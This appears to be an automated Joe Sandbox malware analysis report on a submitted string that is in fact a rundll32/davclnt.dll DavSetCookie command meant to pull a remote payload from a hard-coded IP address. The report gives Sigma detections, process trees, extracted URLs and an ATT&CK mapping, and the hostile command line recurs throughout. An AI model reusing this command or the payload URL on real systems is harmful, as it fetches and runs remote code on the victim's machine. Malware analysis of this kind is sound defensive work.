Edit tour

Windows Analysis Report
http://rundll32.exe C:/WINDOWS/system32/davclnt.dll,DavSetCookie 104.129.20.167 http://104.129.20.167/xhsmd/bOWEU.txt

Overview

General Information

Sample URL:http://rundll32.exe C:/WINDOWS/system32/davclnt.dll,DavSetCookie 104.129.20.167 http://104.129.20.167/xhsmd/bOWEU.txt
Analysis ID:1400588
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: rundll32 run dll from internet
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets
Tries to load missing DLLs
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • cmd.exe (PID: 3200 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt" > cmdline.out 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wget.exe (PID: 2700 cmdline: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt" MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt" > cmdline.out 2>&1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5332, ProcessCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt" > cmdline.out 2>&1, ProcessId: 3200, ProcessName: cmd.exe
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt" > cmdline.out 2>&1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5332, ProcessCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt" > cmdline.out 2>&1, ProcessId: 3200, ProcessName: cmd.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt" > cmdline.out 2>&1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5332, ProcessCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt" > cmdline.out 2>&1, ProcessId: 3200, ProcessName: cmd.exe

Data Obfuscation

barindex
Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt" > cmdline.out 2>&1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5332, ProcessCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt" > cmdline.out 2>&1, ProcessId: 3200, ProcessName: cmd.exe
No Snort rule has matched

Click to jump to signature section

Show All Signature Results
Source: wget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.129.20.167/xhsmd
Source: wget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmp, cmdline.out.0.drString found in binary or memory: http://104.129.20.167/xhsmd/bOWEU.txt
Source: wget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.129.20.167/xhsmd/bOWEU.txt%%8
Source: wget.exe, 00000002.00000002.2009391225.00000000011E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.129.20.167/xhsmd/bOWEU.txt)Pr
Source: wget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.129.20.167/xhsmd/bOWEU.txt9
Source: wget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.129.20.167/xhsmd/bOWEU.txt9S
Source: wget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.129.20.167/xhsmd/bOWEU.txtD$
Source: wget.exe, 00000002.00000002.2009391225.00000000011E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.129.20.167/xhsmd/bOWEU.txtDr
Source: wget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.129.20.167/xhsmd/bOWEU.txtWS/s
Source: wget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.129.20.167/xhsmd/bOWEU.txtc
Source: wget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.129.20.167/xhsmd/bOWEU.txtp://r
Source: wget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.129.20.167/xhsmdsmd$
Source: wget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.129.20.167/xhsmdsmdmd/bOWE
Source: wget.exe, 00000002.00000002.2009314181.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll
Source: wget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmp, cmdline.out.0.drString found in binary or memory: http://rundll32.exe%20c/WINDOWS/system32/davclnt.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: rasadhlp.dllJump to behavior
Source: classification engineClassification label: mal56.evad.win@4/1@0/0
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\cmdline.outJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
Source: C:\Windows\SysWOW64\wget.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt" Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: wget.exe, 00000002.00000002.2009314181.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "http://rundll32.exe%20c:/windows/system32/davclnt.dll,davsetcookie%20104.129.20.167%20http://104.129.20.167/xhsmd/boweu.txt" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "http://rundll32.exe%20c:/windows/system32/davclnt.dll,davsetcookie%20104.129.20.167%20http://104.129.20.167/xhsmd/boweu.txt"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "http://rundll32.exe%20c:/windows/system32/davclnt.dll,davsetcookie%20104.129.20.167%20http://104.129.20.167/xhsmd/boweu.txt" Jump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter
1
DLL Side-Loading
1
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1400588 URL: http://rundll32.exe%20C:/WI... Startdate: 28/02/2024 Architecture: WINDOWS Score: 56 12 Sigma detected: rundll32 run dll from internet 2->12 14 Sigma detected: Invoke-Obfuscation CLIP+ Launcher 2->14 16 Sigma detected: Invoke-Obfuscation VAR+ Launcher 2->16 6 cmd.exe 2 2->6         started        process3 process4 8 conhost.exe 6->8         started        10 wget.exe 1 6->10         started       
SourceDetectionScannerLabelLink
http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://104.129.20.167/xhsmd/bOWEU.txt90%Avira URL Cloudsafe
http://104.129.20.167/xhsmd/bOWEU.txtD$0%Avira URL Cloudsafe
http://104.129.20.167/xhsmd/bOWEU.txt9S0%Avira URL Cloudsafe
http://104.129.20.167/xhsmd/bOWEU.txt)Pr0%Avira URL Cloudsafe
http://104.129.20.167/xhsmdsmdmd/bOWE0%Avira URL Cloudsafe
http://104.129.20.167/xhsmd/bOWEU.txt%%80%Avira URL Cloudsafe
http://104.129.20.167/xhsmd/bOWEU.txtDr0%Avira URL Cloudsafe
http://104.129.20.167/xhsmd/bOWEU.txtp://r0%Avira URL Cloudsafe
http://rundll32.exe%20c/WINDOWS/system32/davclnt.dll0%Avira URL Cloudsafe
http://104.129.20.167/xhsmd/bOWEU.txtWS/s0%Avira URL Cloudsafe
http://104.129.20.167/xhsmd/bOWEU.txtc0%Avira URL Cloudsafe
http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll0%Avira URL Cloudsafe
http://104.129.20.167/xhsmd0%Avira URL Cloudsafe
http://104.129.20.167/xhsmdsmd$0%Avira URL Cloudsafe
http://104.129.20.167/xhsmd/bOWEU.txt0%Avira URL Cloudsafe
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://104.129.20.167/xhsmd/bOWEU.txt%%8wget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://104.129.20.167/xhsmd/bOWEU.txtD$wget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://rundll32.exe%20c/WINDOWS/system32/davclnt.dllwget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmp, cmdline.out.0.drfalse
  • Avira URL Cloud: safe
low
http://104.129.20.167/xhsmd/bOWEU.txt9Swget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://104.129.20.167/xhsmd/bOWEU.txt)Prwget.exe, 00000002.00000002.2009391225.00000000011E0000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://104.129.20.167/xhsmdsmdmd/bOWEwget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://104.129.20.167/xhsmd/bOWEU.txt9wget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://104.129.20.167/xhsmd/bOWEU.txtp://rwget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://104.129.20.167/xhsmd/bOWEU.txtWS/swget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://104.129.20.167/xhsmd/bOWEU.txtDrwget.exe, 00000002.00000002.2009391225.00000000011E0000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://104.129.20.167/xhsmd/bOWEU.txtcwget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://104.129.20.167/xhsmdsmd$wget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://104.129.20.167/xhsmdwget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
http://104.129.20.167/xhsmd/bOWEU.txtwget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmp, cmdline.out.0.drtrue
  • Avira URL Cloud: safe
unknown
http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dllwget.exe, 00000002.00000002.2009314181.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.2009391225.00000000011E5000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
low
No contacted IP infos
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1400588
Start date and time:2024-02-28 23:30:14 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 1m 30s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:urldownload.jbs
Sample URL:http://rundll32.exe C:/WINDOWS/system32/davclnt.dll,DavSetCookie 104.129.20.167 http://104.129.20.167/xhsmd/bOWEU.txt
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal56.evad.win@4/1@0/0
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Unable to download file
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Not all processes where analyzed, report is missing behavior information
  • VT rate limit hit for: http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt
No simulations
No context
No context
No context
No context
No context
Process:C:\Windows\SysWOW64\cmd.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):283
Entropy (8bit):5.195314073261439
Encrypted:false
SSDEEP:6:HRo2UQr1ewk+QyOnRmKiwgSamwSWGkDFw6kDIEcpGmsdXAoeSkD7:HR9RewHN+RmnwXaUjyJyi5ZSy7
MD5:1F5D03C9AF7495F983C9A6103399160A
SHA1:BBBFC622F91145A6DF3636793F7EBFD6E7F0501C
SHA-256:13C1439A8E9FA6CFC765A87EFD6D0C0C3C3BB73C50228026E594ECC1CA4672D5
SHA-512:26EBD0491746279DDBDE65255E7C6CAB4A088B130E1A10F053C06B5C6D04A6CAAA7D0E4AC2A9B5BBB87B32B8C1227831543E592D2A386C3D599144396267E1B5
Malicious:false
Reputation:low
Preview:--2024-02-28 23:31:01-- http://rundll32.exe%20c/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt..Resolving rundll32.exe c (rundll32.exe c)... failed: No such host is known. ...wget: unable to resolve host address 'rundll32.exe c'..
No static file info
No network behavior found
0123s020406080100

Click to jump to process

Click to jump to process

Target ID:0
Start time:23:31:01
Start date:28/02/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt" > cmdline.out 2>&1
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:1
Start time:23:31:01
Start date:28/02/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:2
Start time:23:31:01
Start date:28/02/2024
Path:C:\Windows\SysWOW64\wget.exe
Wow64 process (32bit):true
Commandline:wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://rundll32.exe%20C:/WINDOWS/system32/davclnt.dll,DavSetCookie%20104.129.20.167%20http://104.129.20.167/xhsmd/bOWEU.txt"
Imagebase:0x400000
File size:3'895'184 bytes
MD5 hash:3DADB6E2ECE9C4B3E1E322E617658B60
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

No disassembly